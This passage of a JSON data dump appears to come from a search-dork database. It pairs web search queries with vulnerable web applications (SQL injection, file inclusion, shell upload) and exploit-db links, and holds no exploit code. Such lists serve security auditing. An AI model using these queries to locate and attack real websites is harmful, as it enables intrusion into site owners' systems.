Vulnerabilities - CVE: 2009-2033: http://www.exploit-db.com/exploits/8932", "submited": "2010-11-15", "request": "\"Yogurt build\"", "id": 2886}, {"short description": "inurl:e107_plugins", "long description": "e107 Code Exec - CVE: 2010-2099: http://www.exploit-db.com/exploits/12715", "submited": "2010-11-15", "request": "inurl:e107_plugins", "id": 2887}, {"short description": "\"Scientific Image DataBase\"", "long description": "Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: http://www.exploit-db.com/exploits/5885", "submited": "2010-11-15", "request": "\"Scientific Image DataBase\"", "id": 2888}, {"short description": "Powered by phpMyRealty", "long description": "phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: http://www.exploit-db.com/exploits/4750", "submited": "2010-11-15", "request": "Powered by phpMyRealty", "id": 2889}, {"short description": "\"Powered by myUPB\"", "long description": "myUPB v2.2.6 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/13957", "submited": "2010-11-15", "request": "\"Powered by myUPB\"", "id": 2891}, {"short description": "inurl:\"com_simpledownload\"", "long description": "Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: http://www.exploit-db.com/exploits/12618", "submited": "2010-11-15", "request": "inurl:\"com_simpledownload\"", "id": 2893}, {"short description": "Powered by Flinx", "long description": "flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: http://www.exploit-db.com/exploits/4985", "submited": "2010-11-15", "request": "Powered by Flinx", "id": 2895}, {"short description": "allinurl:\"com_restaurante\"", "long description": "Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: http://www.exploit-db.com/exploits/5280", "submited": "2010-11-15", "request": "allinurl:\"com_restaurante\"", "id": 2896}, {"short description": "Powered by MyHobbySite 1.01", "long description": "MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: http://www.exploit-db.com/exploits/14977", "submited": "2010-11-15", "request": "Powered by MyHobbySite 1.01", "id": 2897}, {"short description": "inurl:index.php?myPlantId=", "long description": "Member ID The Fish Index PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12850", "submited": "2010-11-15", "request": "inurl:index.php?myPlantId=", "id": 2898}, {"short description": "\"powered by real-estate-website\"", "long description": "Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/5763", "submited": "2010-11-15", "request": "\"powered by real-estate-website\"", "id": 2901}, {"short description": "\"Powered by [ iSupport 1.8 ]\"", "long description": "iSupport 1.8 XSS/LFI - CVE: 2009-4434: http://www.exploit-db.com/exploits/10478", "submited": "2010-11-15", "request": "\"Powered by [ iSupport 1.8 ]\"", "id": 2902}, {"short description": "\"This site is powered by CMS Made Simple version 1.2.2\"", "long description": "CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: http://www.exploit-db.com/exploits/4810", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple version 1.2.2\"", "id": 2903}, {"short description": "infusions/manuals/manuals.php?manual=", "long description": "PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6681", "submited": "2010-11-15", "request": "infusions/manuals/manuals.php?manual=", "id": 2905}, {"short description": "allinurl:/modernbill/", "long description": "Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: http://www.exploit-db.com/exploits/2127", "submited": "2010-11-15", "request": "allinurl:/modernbill/", "id": 2906}, {"short description": "Powered by EasySiteNetwork", "long description": "Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: http://www.exploit-db.com/exploits/4770", "submited": "2010-11-15", "request": "Powered by EasySiteNetwork", "id": 2907}, {"short description": "inurl:\"main_forum.php?cat=\"", "long description": "GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: http://www.exploit-db.com/exploits/10299", "submited": "2010-11-15", "request": "inurl:\"main_forum.php?cat=\"", "id": 2908}, {"short description": "\"eCommerce Engine 2006 xt:Commerce Shopsoftware\"", "long description": "xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15455", "submited": "2010-11-15", "request": "\"eCommerce Engine 2006 xt:Commerce Shopsoftware\"", "id": 2910}, {"short description": "intitle:\"Powered by Open Bulletin Board\"", "long description": "Open Bulletin Board Multiple Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11336", "submited": "2010-11-15", "request": "intitle:\"Powered by Open Bulletin Board\"", "id": 2911}, {"short description": "\"My Photo v1.46.4 Big Resources\"", "long description": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7645", "submited": "2010-11-15", "request": "\"My Photo v1.46.4 Big Resources\"", "id": 2912}, {"short description": "Powered by Fantastic News v2.1.4", "long description": "Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/3027", "submited": "2010-11-15", "request": "Powered by Fantastic News v2.1.4", "id": 2913}, {"short description": "Platform Dokeos 1.8.4 2007", "long description": "Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: http://www.exploit-db.com/exploits/4753", "submited": "2010-11-15", "request": "Platform Dokeos 1.8.4 2007", "id": 2914}, {"short description": "\"Powered by iScripts SocialWare\"", "long description": "iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: http://www.exploit-db.com/exploits/5402", "submited": "2010-11-15", "request": "\"Powered by iScripts SocialWare\"", "id": 2915}, {"short description": "Powered By eLitius 1.0", "long description": "eLitius 1.0 Arbitrary Database Backup: http://www.exploit-db.com/exploits/8498", "submited": "2010-11-15", "request": "Powered By eLitius 1.0", "id": 2916}, {"short description": "inurl:\"com_artlinks\"", "long description": "Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: http://www.exploit-db.com/exploits/2209", "submited": "2010-11-15", "request": "inurl:\"com_artlinks\"", "id": 2917}, {"short description": "inurl:com_djclassifieds", "long description": "Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: http://www.exploit-db.com/exploits/12479", "submited": "2010-11-15", "request": "inurl:com_djclassifieds", "id": 2918}, {"short description": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "long description": "Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: http://www.exploit-db.com/exploits/2172", "submited": "2010-11-15", "request": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "id": 2919}, {"short description": "inurl:ratelink.php?lnkid=", "long description": "Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: http://www.exploit-db.com/exploits/6650", "submited": "2010-11-15", "request": "inurl:ratelink.php?lnkid=", "id": 2920}, {"short description": "Powered by: deonixscripts.com", "long description": "Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: http://www.exploit-db.com/exploits/4482", "submited": "2010-11-15", "request": "Powered by: deonixscripts.com", "id": 2921}, {"short description": "inurl:com_ybggal", "long description": "Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13979", "submited": "2010-11-15", "request": "inurl:com_ybggal", "id": 2922}, {"short description": "Powered By Power Editor", "long description": "Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: http://www.exploit-db.com/exploits/5549", "submited": "2010-11-15", "request": "Powered By Power Editor", "id": 2923}, {"short description": "\"Powered by: eSmile\"", "long description": "eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: http://www.exploit-db.com/exploits/11382", "submited": "2010-11-15", "request": "\"Powered by: eSmile\"", "id": 2924}, {"short description": "\"advanced_search_results.php?gender=\"", "long description": "Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: http://www.exploit-db.com/exploits/6388", "submited": "2010-11-15", "request": "\"advanced_search_results.php?gender=\"", "id": 2925}, {"short description": "allinurl:\"com_ahsshop\"do=default", "long description": "Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5335", "submited": "2010-11-15", "request": "allinurl:\"com_ahsshop\"do=default", "id": 2926}, {"short description": "inurl:com_ice \"catid\"", "long description": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: http://www.exploit-db.com/exploits/7572", "submited": "2010-11-15", "request": "inurl:com_ice \"catid\"", "id": 2927}, {"short description": "Powered by ExoPHPDesk v1.2 Final.", "long description": "ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: http://www.exploit-db.com/exploits/3234", "submited": "2010-11-15", "request": "Powered by ExoPHPDesk v1.2 Final.", "id": 2928}, {"short description": "allinurl:spaw2/dialogs/", "long description": "Spaw Editor v1.0 &amp; 2.0 Remote File Upload: http://www.exploit-db.com/exploits/12672", "submited": "2010-11-15", "request": "allinurl:spaw2/dialogs/", "id": 2931}, {"short description": "Powered by eLitius Version 1.0", "long description": "eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: http://www.exploit-db.com/exploits/8563", "submited": "2010-11-15", "request": "Powered by eLitius Version 1.0", "id": 2932}, {"short description": "site:scartserver.com", "long description": "SCart 2.0 (page) Remote Code Execution - CVE: 2006-7012: http://www.exploit-db.com/exploits/1876", "submited": "2010-11-15", "request": "site:scartserver.com", "id": 2935}, {"short description": "\"realizacja eCreo.eu\"", "long description": "eCreo SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12713", "submited": "2010-11-15", "request": "\"realizacja eCreo.eu\"", "id": 2936}, {"short description": "inurl:index.php?title=gamepage", "long description": "PHP Gamepage SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12634", "submited": "2010-11-15", "request": "inurl:index.php?title=gamepage", "id": 2939}, {"short description": "inurl:index.php?option=com_akobook", "long description": "Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: http://www.exploit-db.com/exploits/8911", "submited": "2010-11-15", "request": "inurl:index.php?option=com_akobook", "id": 2940}, {"short description": "inurl:\"/CMS/page.php?p=\"", "long description": "Schweizer NISADA Communication CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10543", "submited": "2010-11-15", "request": "inurl:\"/CMS/page.php?p=\"", "id": 2942}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: http://www.exploit-db.com/exploits/7625", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 2943}, {"short description": "Powered by: Maian Uploader v4.0", "long description": "Maian Uploader v4.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11571", "submited": "2010-11-15", "request": "Powered by: Maian Uploader v4.0", "id": 2945}, {"short description": "intext:\"Tainos Webdesign\"", "long description": "Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12631", "submited": "2010-11-15", "request": "intext:\" Tainos Webdesign\"", "id": 2948}, {"short description": "inurl:\"com_virtuemart\"", "long description": "Joomla Component com_virtuemart SQL injection vulnerability (product_id): http://www.exploit-db.com/exploits/10407", "submited": "2010-11-15", "request": "inurl:\"com_virtuemart\"", "id": 2949}, {"short description": "\"Powered by RW::Download v2.0.3 lite\"", "long description": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: http://www.exploit-db.com/exploits/4371", "submited": "2010-11-15", "request": "\"Powered by RW::Download v2.0.3 lite\"", "id": 2950}, {"short description": "index.php?option=com_swmenupro", "long description": "Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: http://www.exploit-db.com/exploits/3557", "submited": "2010-11-15", "request": "index.php?option=com_swmenupro", "id": 2951}, {"short description": "\"Powered By OpenCart\"", "long description": "Opencart 1.4.9.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/15050", "submited": "2010-11-15", "request": "\"Powered By OpenCart\"", "id": 2952}, {"short description": "Powered by eclime.com", "long description": "eclime v1.1 ByPass / Create and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12279", "submited": "2010-11-15", "request": "Powered by eclime.com", "id": 2953}, {"short description": "inurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: http://www.exploit-db.com/exploits/7240", "submited": "2010-11-15", "request": "inurl:\"article.download.php\"", "id": 2955}, {"short description": "inurl:\"com_mojo\"", "long description": "Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: http://www.exploit-db.com/exploits/10273", "submited": "2010-11-15", "request": "inurl:\"com_mojo\"", "id": 2956}, {"short description": "inurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote Blind SQL Injection - CVE: 2008-7075: http://www.exploit-db.com/exploits/7243", "submited": "2010-11-15", "request": "inurl:\"article.download.php\"", "id": 2957}, {"short description": "\"Powered by LightBlog\" - Powered by LightBlog", "long description": "LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: http://www.exploit-db.com/exploits/5033", "submited": "2010-11-15", "request": "\"Powered by LightBlog\" - Powered by LightBlog", "id": 2958}, {"short description": "\"Powered by photokorn\"", "long description": "photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: http://www.exploit-db.com/exploits/4897/", "submited": "2010-11-15", "request": "\"Powered by photokorn\"", "id": 2959}, {"short description": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "long description": "Powder Blue Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12671", "submited": "2010-11-15", "request": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "id": 2960}, {"short description": "\"Powered by  MetInfo 3.0\"", "long description": "MetInfo 3.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15361", "submited": "2010-11-15", "request": "\"Powered by  MetInfo 3.0\"", "id": 2961}, {"short description": "\"Powered by  MetInfo  2.0\"", "long description": "MetInfo 2.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15360", "submited": "2010-11-15", "request": "\"Powered by  MetInfo  2.0\"", "id": 2962}, {"short description": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "long description": "Marketing Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12788", "submited": "2010-11-15", "request": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "id": 2963}, {"short description": "pages.php?id= \"Multi Vendor Mall\"", "long description": "Multi Vendor Mall (pages.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12748", "submited": "2010-11-15", "request": "pages.php?id= \"Multi Vendor Mall\"", "id": 2964}, {"short description": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "long description": "eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: http://www.exploit-db.com/exploits/4154", "submited": "2010-11-15", "request": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "id": 2966}, {"short description": "Powered by Zylone IT", "long description": "Zylone IT Multiple Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14270", "submited": "2010-11-15", "request": "Powered by Zylone IT", "id": 2968}, {"short description": ":        \"intitle:t3al shmeh\"", "long description": "http://www.exploit-db.com/exploits/9347", "submited": "2010-11-15", "request": "", "id": 2969}, {"short description": "Powered by MetInfo 3.0", "long description": "Metinfo v3.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15496", "submited": "2010-11-15", "request": "Powered by MetInfo 3.0", "id": 2970}, {"short description": "Powered by Info Fisier.", "long description": "Info Fisier 1.0 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10671", "submited": "2010-11-15", "request": "Powered by Info Fisier.", "id": 2971}, {"short description": "\"Powered by WebText\"", "long description": "WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: http://www.exploit-db.com/exploits/3036", "submited": "2010-11-15", "request": "\"Powered by WebText\"", "id": 2972}, {"short description": "Webdevelopment Tinx-IT", "long description": "WebVision 2.1 (news.php n) Remote SQL Injection: http://www.exploit-db.com/exploits/9193", "submited": "2010-11-15", "request": "Webdevelopment Tinx-IT", "id": 2973}, {"short description": "\"PHPGlossar Version 0.8\"", "long description": "PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities - CVE: 2007-2751: http://www.exploit-db.com/exploits/3941", "submited": "2010-11-15", "request": "\"PHPGlossar Version 0.8\"", "id": 2975}, {"short description": "com_ijoomla_rss", "long description": "Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: http://www.exploit-db.com/exploits/8959", "submited": "2010-11-15", "request": "com_ijoomla_rss", "id": 2976}, {"short description": "inurl:\"?pilih=forum\"", "long description": "AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: http://www.exploit-db.com/exploits/4254", "submited": "2010-11-15", "request": "inurl:\"?pilih=forum\"", "id": 2977}, {"short description": "\"Developed by Infoware Solutions\"", "long description": "infoware SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12714", "submited": "2010-11-15", "request": "\"Developed by Infoware Solutions\"", "id": 2978}, {"short description": "\"Powered by: MyPHP Forum\"", "long description": "MyPHP Forum", "submited": "2010-11-15", "request": "\"Powered by: MyPHP Forum\"", "id": 2979}, {"short description": "Ayemsis Emlak Pro", "long description": "Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7665", "submited": "2010-11-15", "request": "Ayemsis Emlak Pro", "id": 2981}, {"short description": "Powered by Guruscript.com", "long description": "Freelancer Marketplace Script Upload Vulnerability: http://www.exploit-db.com/exploits/14390", "submited": "2010-11-15", "request": "Powered by Guruscript.com", "id": 2983}, {"short description": "allinurl:\"index.php?mod=archives\"", "long description": "KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5351", "submited": "2010-11-15", "request": "allinurl:\"index.php?mod=archives\"", "id": 2985}, {"short description": "\"index.php?option=com_qcontacts\"", "long description": "Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14350", "submited": "2010-11-15", "request": "\"index.php?option=com_qcontacts\"", "id": 2986}, {"short description": "Powered by sijio - Community Software", "long description": "Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: http://www.exploit-db.com/exploits/14260", "submited": "2010-11-15", "request": "Powered by sijio - Community Software", "id": 2987}, {"short description": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "long description": "crownweb (page.cfm) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11299", "submited": "2010-11-15", "request": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "id": 2988}, {"short description": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "long description": "Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: http://www.exploit-db.com/exploits/4804", "submited": "2010-11-15", "request": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "id": 2989}, {"short description": "Powered by TextAds 2.08", "long description": "idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: http://www.exploit-db.com/exploits/13749", "submited": "2010-11-15", "request": "Powered by TextAds 2.08", "id": 2990}, {"short description": "inurl:/com_chronocontact", "long description": "Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: http://www.exploit-db.com/exploits/5020", "submited": "2010-11-15", "request": "inurl:/com_chronocontact", "id": 2991}, {"short description": "inurl:\"com_kochsuite\"", "long description": "Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability  - CVE: 2006-4348: http://www.exploit-db.com/exploits/2215", "submited": "2010-11-15", "request": "inurl:\"com_kochsuite\"", "id": 2994}, {"short description": "inurl:\"contentPage.php?id=\" &amp; inurl:\"displayResource.php?id=\" &amp; ...", "long description": "MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12792", "submited": "2010-11-15", "request": "inurl:\"contentPage.php?id=\" OR inurl:\"displayResource.php?id=\" AND intext:\"Website by Mile High Creative\"", "id": 2995}, {"short description": "Come from home Script ( Latest Project ) www.esmart-vision.com", "long description": "Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10977", "submited": "2010-11-15", "request": "Come from home Script ( Latest Project ) www.esmart-vision.com", "id": 2996}, {"short description": "inurl:com_jepoll", "long description": "Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12781", "submited": "2010-11-15", "request": "inurl:com_jepoll", "id": 2997}, {"short description": "inurl:option=articles artid", "long description": "Mambo Component Articles (artid) Blind SQL Injection: http://www.exploit-db.com/exploits/5935", "submited": "2010-11-15", "request": "inurl:option=articles artid", "id": 2998}, {"short description": "inurl:\"com_jembed\"", "long description": "com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: http://www.exploit-db.com/exploits/11026", "submited": "2010-11-15", "request": "inurl:\"com_jembed\"", "id": 2999}, {"short description": "\"powered by Gradman\"", "long description": "Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: http://www.exploit-db.com/exploits/4926", "submited": "2010-11-15", "request": "\"powered by Gradman\"", "id": 3002}, {"short description": "inurl:com_bfsurvey_profree", "long description": "Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: http://www.exploit-db.com/exploits/9601", "submited": "2010-11-15", "request": "inurl:com_bfsurvey_profree", "id": 3003}, {"short description": "inurl:option=com_cinema", "long description": "Joomla component cinema SQL injection Vulnerability: http://www.exploit-db.com/exploits/13792", "submited": "2010-11-15", "request": "inurl:option=com_cinema", "id": 3005}, {"short description": "inurl:com_jejob", "long description": "Joomla JE Job Component com_jejob LFI Vulnerability: http://www.exploit-db.com/exploits/14063", "submited": "2010-11-15", "request": "inurl:com_jejob", "id": 3006}, {"short description": "inurl:prog.php?dwkodu=", "long description": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: http://www.exploit-db.com/exploits/6310", "submited": "2010-11-15", "request": "inurl:prog.php?dwkodu=", "id": 3007}, {"short description": "\"Designed and powered by AWS Sports\"", "long description": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14645", "submited": "2010-11-15", "request": "\"Designed and powered by AWS Sports\"", "id": 3010}, {"short description": "\"powered by zomplog\"", "long description": "Zomplog", "submited": "2010-11-15", "request": "\"powered by zomplog\"", "id": 3011}, {"short description": "\"Powered by WebStudio\"", "long description": "WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: http://www.exploit-db.com/exploits/7216", "submited": "2010-11-15", "request": "Joomla Component com_eportfolio Upload Vulnerability", "id": 3013}, {"short description": "inurl:com_eportfolio", "long description": "Joomla Component com_eportfolio Upload Vulnerability: http://www.exploit-db.com/exploits/13951", "submited": "2010-11-15", "request": "inurl:com_eportfolio", "id": 3014}, {"short description": "intext:\"Parlic Design\" inurl:id", "long description": "parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12767", "submited": "2010-11-15", "request": "intext:\"Parlic Design\" inurl:id", "id": 3015}, {"short description": "[ Powered by SkaDate dating ]", "long description": "SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: http://www.exploit-db.com/exploits/9260", "submited": "2010-11-15", "request": "[ Powered by SkaDate dating ]", "id": 3016}, {"short description": "inurl:com_jotloader", "long description": "Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: http://www.exploit-db.com/exploits/5737", "submited": "2010-11-15", "request": "inurl:com_jotloader", "id": 3017}, {"short description": "\"Site designed and built Powered by GlobalWebTek.\"", "long description": "GlobalWebTek Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12761", "submited": "2010-11-15", "request": "\"Site designed and built Powered by GlobalWebTek.\"", "id": 3018}, {"short description": "inurl:/wp-content/plugins/fgallery/", "long description": "Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: http://www.exploit-db.com/exploits/4993", "submited": "2010-11-15", "request": "inurl:/wp-content/plugins/fgallery/", "id": 3019}, {"short description": "2010 Powered by Subrion CMS", "long description": "Subrion Auto Classifieds Persistent Xss Vulnerability: http://www.exploit-db.com/exploits/14391", "submited": "2010-11-15", "request": "2010 Powered by Subrion CMS", "id": 3021}, {"short description": "Copyright 2007-2009 by Kasseler CMS. All rights reserved.", "long description": "Kasseler CMS 2.0.5 =&gt; By Pass / Download Backup Vulnerability - CVE: 2009-4822: http://www.exploit-db.com/exploits/12402", "submited": "2010-11-15", "request": "Copyright 2007-2009 by Kasseler CMS. All rights reserved.", "id": 3022}, {"short description": "Powered by Guruscript.com", "long description": "Freelancers Marketplace Script Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/14389", "submited": "2010-11-15", "request": "Powered by Guruscript.com", "id": 3023}, {"short description": "\"powered by jshop\"", "long description": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: http://www.exploit-db.com/exploits/5325", "submited": "2010-11-15", "request": "\"powered by jshop\"", "id": 3024}, {"short description": "\"Powered by TS Special Edition\"", "long description": "TS Special Edition v.7.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12645", "submited": "2010-11-15", "request": "\"Powered by TS Special Edition\"", "id": 3025}, {"short description": "inurl:/jobsearchengine/", "long description": "i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: http://www.exploit-db.com/exploits/14079", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3026}, {"short description": "inurl:\"com_jgen\"", "long description": "Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: http://www.exploit-db.com/exploits/14998", "submited": "2010-11-15", "request": "inurl:\"com_jgen\"", "id": 3027}, {"short description": "inurl:inc_webblogmanager.asp", "long description": "DMXReady Blog Manager", "submited": "2010-11-15", "request": "inurl:inc_webblogmanager.asp", "id": 3028}, {"short description": "Powered by eLitius Version 1.0", "long description": "eLitius 1.0 (manage-admin.php) Add Admin/Change Password: http://www.exploit-db.com/exploits/8459", "submited": "2010-11-15", "request": "Powered by eLitius Version 1.0", "id": 3029}, {"short description": "inurl:com_n-forms", "long description": "Joomla Component n-forms 1.01 Blind SQL Injection: http://www.exploit-db.com/exploits/6055", "submited": "2010-11-15", "request": "inurl:com_n-forms", "id": 3030}, {"short description": "inurl:index.php?option=com_races \"raceId\"", "long description": "Joomla Component com_races Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11710", "submited": "2010-11-15", "request": "inurl:index.php?option=com_races \"raceId\"", "id": 3032}, {"short description": "\"powered by gelato cms\"", "long description": "Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: http://www.exploit-db.com/exploits/4410", "submited": "2010-11-15", "request": "\"powered by gelato cms\"", "id": 3034}, {"short description": "inurl:\"cont_form.php?cf_id=\"", "long description": "WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: http://www.exploit-db.com/exploits/14123", "submited": "2010-11-15", "request": "inurl:\"cont_form.php?cf_id=\"", "id": 3035}, {"short description": "allinurl:links.php?t=search", "long description": "phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: http://www.exploit-db.com/exploits/4346", "submited": "2010-11-15", "request": "allinurl:links.php?t=search", "id": 3036}, {"short description": "inurl:\"com_dateconverter\"", "long description": "Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14154", "submited": "2010-11-15", "request": "inurl:\"com_dateconverter\"", "id": 3038}, {"short description": "inurl:\"com_simplefaq\"", "long description": "Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: http://www.exploit-db.com/exploits/11294", "submited": "2010-11-15", "request": "inurl:\"com_simplefaq\"", "id": 3040}, {"short description": "inurl:com_jb2", "long description": "Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: http://www.exploit-db.com/exploits/5734", "submited": "2010-11-15", "request": "inurl:com_jb2", "id": 3042}, {"short description": "inurl:\"com_dms\"", "long description": "Joomla Component com_dms SQL Injection Vulnerability - CVE: 2010-0800: http://www.exploit-db.com/exploits/11289", "submited": "2010-11-15", "request": "inurl:\"com_dms\"", "id": 3044}, {"short description": "\"powered by: profitCode\"", "long description": "PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: http://www.exploit-db.com/exploits/2316", "submited": "2010-11-15", "request": "\"powered by: profitCode\"", "id": 3045}, {"short description": "inurl:/phpplanner/userinfo.php?userid=", "long description": "phpplanner XSS / SQL Vulnerability: http://www.exploit-db.com/exploits/13847", "submited": "2010-11-15", "request": "inurl:/phpplanner/userinfo.php?userid=", "id": 3046}, {"short description": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "long description": "PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: http://www.exploit-db.com/exploits/3524", "submited": "2010-11-15", "request": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "id": 3047}, {"short description": "Powered by UGiA PHP UPLOADER V0.2", "long description": "UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11261", "submited": "2010-11-15", "request": "Powered by UGiA PHP UPLOADER V0.2", "id": 3048}, {"short description": "Powered by 